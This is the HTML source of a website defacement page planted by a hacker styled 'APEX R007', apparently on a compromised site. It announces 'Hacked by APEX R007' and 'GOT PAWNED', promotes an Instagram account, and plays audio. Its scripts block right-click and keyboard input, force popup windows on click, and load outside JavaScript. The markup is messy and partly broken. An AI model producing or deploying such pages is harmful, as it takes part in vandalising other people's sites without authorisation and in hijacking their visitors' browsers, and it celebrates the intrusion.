<html lang="ar">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="icon" href="https://k.top4top.io/p_2584jifef0.jpg">
<meta content= Hacked By APEX R007 name= description  />
<meta content= Top (1)  name= keywords  />
<meta content= INDIA Cyber Security team  name= Abstract  />
<meta name="title" content="Hacked by APEX R007| INDIAN  Hackers">
<meta name="description" content="INDIAN Hackers was here!">
<meta name="keywords" content="APEX R007">
<meta name="googlebot" content="index,follow" />
<meta name="robots" content="all" />
<meta name="robots schedule" content="auto" />
<meta name="distribution" content="global" />
<title>Hacked by APEX R007 |INDIAN Hackers </title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="all" /><meta name="robots schedule" content="auto" />
<meta name="distribution" content="global" /><link href="https://fonts.googleapis.com/css?family=Share+Tech+Mono|Rajdhani|Oswald:700|Iceland|PT+Sans&display=swap" rel="stylesheet" type="text/css">
<base target= _blank  /><body><center>
<meta content= width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;  name= viewport  />
<meta name="viewport" content="width=device-width" />
<style>
@import url('https://fonts.googleapis.com/css2?family=Cairo&display=swap');
body{
}
	.TYG {
	font-family: 'Cairo', sans-serif;
	font-size:55px;
	color:white,
}
	*{font-family: Iceland, sans-serif !important;}
</style>
<style>
.gambargetar{position:relative}
img:hover{opacity:1}textarea{resize:none}
img {
    position:relative;opacity:1.0
}
</style>

<style type="text/css">
@import url('https://fonts.googleapis.com/css2?family=Cairo&display=swap');
body{
}
	.TYG {
	font-family: 'Cairo', sans-serif;
	font-size:55px;
	color:white,
}

@media only screen and (max-device-width: 480px) {
html, body {
  overflow-x: hidden;
}
body {
  position: relative;
}
    img {    
    weight: 100%;
    position: relative;
    margin: -4;
}
</style>
<style type="text/css">body, a:hover {cursor: url(https://cur.cursors-4u.net/cursors/cur-7/cur686.cur), progress !important;}</style>
</script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
@import url('https://fonts.googleapis.com/css2?family=Cairo&display=swap');
body{
}
	.TYG {
	font-family: 'Cairo', sans-serif;
	font-size:55px;
	color:white,
}
   body,td,th {
   color: #000;
   margin: 0;
   padding: 0;
   height: 100%;
   position: relative;
   font-family: 'Cairo', sans-serif;
   background-image: url(https://c.top4top.io/p_25802wh140.jpg);
   
   }
</style>
<body oncontextmenu="return false;">
</body>
<script>
  document.onkeydown = function (e) {
          return false;
  }
  </script>
<script>
    document.addEventListener( DOMContentLoaded , () => {
    let mousePosX = 0,
        mousePosY = 0,
        mouseCircle = document.getElementById( mouse-circle );

    document.onmousemove = (e) => {
        mousePosX = e.pageX;
        mousePosY = e.pageY;
    }

    let delay = 8,
        revisedMousePosX = 0,
        revisedMousePosY = 0;

    function delayMouseFollow() {
        requestAnimationFrame(delayMouseFollow);

        revisedMousePosX += (mousePosX - revisedMousePosX) / delay;
        revisedMousePosY += (mousePosY - revisedMousePosY) / delay; 

        mouseCircle.style.top = revisedMousePosY +  px ;
        mouseCircle.style.left = revisedMousePosX +  px ;
    }
    delayMouseFollow();
});
    document.addEventListener("contextmenu", function(e){
        e.preventDefault();
    }, false);
    </script>
<body oncontextmenu= return false;  onkeydown= return false;  onmousedown= return false; >
<FONT size="5" color="red"><CENTER><BIG>&#9733; <FONT size="5" color=white><BIG>&#9733;</BIG></FONT> &#9733; <FONT size="5" color=white><BIG>&#9733;</BIG></FONT> &#9733; <FONT size="5" color=white><BIG>&#9733;</BIG></FONT> &#9733;</BIG></CENTER></FONT>
<div style="line-height:40%;">
<br>
</div>
<div id="mouse-circle"></div>
<body>
<style type="text/css">
	body{
			margin: 0 auto;
			position: relative;
	}
.message-box{
		    font-family: 'Josefin Sans', cursive;
		    color: white;
		    text-align: center;
		    text-shadow: 0 0 10px red;
		}

		</style>
</script>
    <script type="text/javascript" src="http://aakashbapna.github.io/jet-planes/doodle.js"></script>
<script type="text/javascript">
 doodle.init("http://aakashbapna.github.io/jet-planes/jet.png");
</script>
<centre><centre><img src="https://k.top4top.io/p_2584jifef0.jpg" width="300" height="300"onclick="location.href =  "https://instagram.com/apex_r007?igshid=NDk5N2NlZjQ=">
<br>
</div>
<a <div id="center"> <font color="orange" size="7" face="Share Tech Mono">Hacked by <font color="white"> </font> <a style="text-decoration:none" href="https://instagram.com/apex_r007?igshid=NDk5N2NlZjQ="> <br> <font color="white"> APEX R007 </font> <br> <font color="green">HACKERS OF INDIA </a></font>
<div style="line-height:30%;">
<br>
</div>
<div id="center"> <font color="white" size="5" face="Share Tech Mono">[ <font color="red">OP INDIAN HACKER 🇮🇳<font color="white"> ] There is no security system without the presence of hackers  [ <font color="red">GOT PAWNED BY INDIAN 🇮🇳 HACKER APEX R007<font color="white"> ] <br></br>[<font color="red"> <font color="red"> !<font color="white"> ] INDIAN Hackers Was Here  [<font color="red"> !<font color="white"> ]<br>instagram :apex_r007</br></a></div>
<div style="line-height:30%;">
</div>
<audio controls>
<source src="https://b.top4top.io/m_2580b90050.mp3" type="audio/mp3">
</audio>

<FONT color=#FF0000></font>
</body>
</center>
<script type="text/javascript">

    var popup = function() {
        window.open ("https://instagram.com/apex_r007?igshid=NDk5N2NlZjQ=", "Window","status=1,toolbar=1");
        window.open ("https://instagram.com/apex_r007?igshid=NDk5N2NlZjQ==", "Window2","status=1,toolbar=1");
    }

</script>
<body onclick="popup()">
<style type="text/css">
.Sami{ 
background:transparent;
border:3px solid white;
text-shadow:0px 0px 5px red;
border-radius:13px; font-family:Share Tech Mono;
color:red; font-size:18x; font-weight:bold; padding:3px 29px; text-decoration:none; text-shadow:0px 0px 20px #dbe600;height:40px;width:110px; } </style>
<center>
<div style="line-height:70%;">
<br>
</div>
<marquee width="450" scrollamount="12" behavior="scroll" direction="left"><font color="red" size="5" face="Share Tech Mono">APEX R007</font><font color="white" size="5" face="Share Tech Mono"> INDIAN Hackers Was Here !!</font></marquee>
<div style="line-height:30%;">
<br>
</div>
<font color="white" size="5" face="Share Tech Mono">-=-=-=-=-=-=-=-=-</font>
<div id="live2d-widget" class="live2d-widget-container" style="position: fixed; left: 0px; bottom: 0px; width: 220px; height: 320px; z-index: 99999; opacity: 1; pointer-events: none;"><div class="live2d-widget-dialog-container" style="transform: scale(0.88);"><div class="live2d-widget-dialog" style="opacity: 0;">APEX R007</div></div><canvas id="live2dcanvas" width="440" height="640" style="position: absolute; left: 0px; top: 0px; width: 220px; height: 320px;"></canvas></div>
</html>

